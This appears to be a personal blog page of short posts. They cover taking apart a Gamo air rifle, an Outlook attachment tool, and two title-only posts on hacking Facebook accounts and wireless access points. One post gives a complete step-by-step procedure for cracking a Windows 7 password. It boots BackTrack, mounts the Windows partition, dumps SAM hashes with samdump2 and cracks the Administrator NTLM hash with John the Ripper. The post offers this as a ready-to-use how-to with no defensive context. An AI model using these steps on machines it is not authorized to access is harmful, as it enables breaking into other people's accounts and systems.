Disassemble gamo Bone Collector IGT

There’s nothing worse then starting to loose FPS without a reason. Just in time for my warranty to lapse. Damn it Gamo….

So I built my own press to disassemble the gamo air rifle. The gas spring doesn’t need that much room but you need a press to install and remove.

After I got the whole thing taken apart and I found some of the worse damage I’ve ever seen on a plunger.

 

IMG 0276 thumb Disassemble gamo Bone Collector IGTIMG 0278 thumb Disassemble gamo Bone Collector IGTIMG 0279 thumb Disassemble gamo Bone Collector IGT

The Press isn’t hard to make. Just need some wood and some time. I used a 1/2 inch bolt to press the gas piston to uninstall and install. On the Bone Collector model you must remove the reset wire on the trigger group before going too far.

Posted in Secuirty | Leave a comment

Crack windows 7 password

1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say

  "mkdir /mnt/sda2"

4. Mount your device parition to the directory

  "mount -t ntfs /dev/sda2 /mnt/sda2"

where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present.

  "cd /mnt/sda2/Windows/System32/config"

6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"

  "samdump2 system sam > /root/pass1"

7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2"

  "cat /root/pass1 | grep Administrator > /root/pass2"

8. Change the directory to /pentest/password/jtr

   "cd /pentest/passwords/jtr"

9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it.

   "./john --format=NT /root/pass2"
Posted in Secuirty | Leave a comment

How to hack facebook and get full permissions on any account

Full credit goes to Nir Goldshlager

Posted in Secuirty | 1 Comment

Hacking wireless APs with Hydra

All credit goes to purehate at http://www.backtrack-linux.org/forums/showthread.php?t=6867

He did a great job showing a quick video.

Posted in Secuirty | 1 Comment

Download all Outlook 2010 attachments

Windows only: Email attachment searching utility OutlookAttachView has a killer feature: You can export or delete multiple attachments at once—so you can finally get your files out of your inbox.

The Options -> Show Inline Attachments checkbox is probably a good idea if you get a lot of embedded pictures through email, as they aren’t stored as regular attachments in Outlook. Once you’ve selected the attachments you want to handle, use the File menu to copy the attachments to a folder, and then you can even delete the attachments in bulk to save a ton of space in your mailbox.

This application even works if you’re on an Exchange Server!

Download: http://www.nirsoft.net/utils/outlook_attachment.html

I’m using this application to download all security camera CCTV email attachments.

image thumb Download all Outlook 2010 attachments

Posted in Secuirty | 1 Comment
  • Welcome to TomSchaefer.org